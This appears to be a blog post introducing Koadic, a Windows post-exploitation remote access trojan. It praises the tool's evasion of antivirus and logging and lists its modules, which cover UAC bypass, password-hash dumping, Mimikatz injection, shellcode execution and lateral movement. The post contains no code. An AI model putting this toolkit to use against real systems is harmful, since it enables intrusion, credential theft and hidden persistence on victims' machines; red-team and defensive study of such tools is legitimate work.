All of us know that post-exploitation we need some mechanism to maintain access on the target. One of the most common methods is by installing a trojan. I have tried to maintain a list of similar tools on the malware sources page on this blog. Now, there is a new entrant which ups the game real time – Koadic. It also happens to be open source and as much difficult to detect by using common methods.
What is Koadic?
Koadic is an open source, post-exploitation rat aka remote access trojan that uses the Windows Script Host; via the COM interface, for most of it’s operations. You must be aware of or already using other techniques such as the Metasploit meterpreter or your favourite PowerShell based framework to carry out the dirty post-exploitation work. Heck, if you are in NSA/CIA (or other three letter government agency), chances of you using something better than Danderspritz are higher. But there are problem with the above techniques. Meterpreter shells are detected by almost all good anti-virus products. PowerShell leaves a huge audit-trail sort of logging for any one to view using the Windows Event Viewer. The only option now is to use the bigger Danderspritz cousin or create something of your own. If you can do that, good for you. If not, use Koadic. Why? Since it uses VBScript/JScript you can expect it to work on all Microsoft Windows operating systems from Windows 2000 onwards as it has inbuilt support. Not only that, you have an option of running payloads completely in memory or on the disk. Also, depending on what OS does Koadic get installed onto, cryptographically secure communications over SSL and TLS are also possible.
In the advanced Microsoft Windows RAT terminology, the systems you control are called as Zombies. Then, there are stagers, which hook target zombies and allow you to use implants. Implants start jobs on zombies.
Current Koadic Stagers:
stager/js/mshta: serves payloads in memory using MSHTA.exe HTML Applications
stager/js/regsvr: serves payloads in memory using regsvr32.exe COM+ scriptlets
stager/js/rundll32_js: serves payloads in memory using rundll32.exe
stager/js/disk: serves payloads using files on disk
Current Koadic Implants:
implant/elevate/bypassuac_eventvwr: Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
implant/elevate/bypassuac_sdclt: Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10.
implant/fun/zombie: Maxes volume and opens The Cranberries YouTube in a hidden window.
implant/fun/thunderstruck: Maxes volume and opens The AC/DC Thunder Struck YouTube in a hidden window.
implant/fun/voice: Plays a message over text-to-speech.
implant/gather/enum_shares: Retrieves the currently shared directories.
implant/gather/enum_users: Retrieves a user list.
implant/gather/clipboard: Retrieves the current content of the user clipboard.
implant/gather/hashdump_sam: Retrieves hashed passwords from the SAM hive.
implant/gather/hashdump_dc: Domain controller hashes from the NTDS.dit file.
implant/inject/mimikatz_dynwrapx: Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
implant/inject/mimikatz_dotnet2js: Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
implant/inject/shellcode_excel: Runs arbitrary shellcode payload (if Excel is installed).
implant/manage/enable_rdesktop: Enables remote desktop on the target.
implant/manage/exec_cmd: Run an arbitrary command on the target, and optionally receive the output.
implant/pivot/stage_wmi: Hook a zombie on another machine using WMI.
implant/pivot/exec_psexec: Run a command on another machine using psexec from sysinternals.
implant/scan/tcp: Uses HTTP to scan open TCP ports on the target zombie LAN.
implant/utils/download_file: Downloads a file from the target zombie.
implant/utils/upload_file: Uploads a file from the listening server to the target zombies.
So you see there is a lot you can do with Koadic albeit safely and without raising much noise.
The “administration” panel of this advanced Windows JScript/VBScript RAT is in Python. Hence, you need to checkout it’s GIT repository from this link.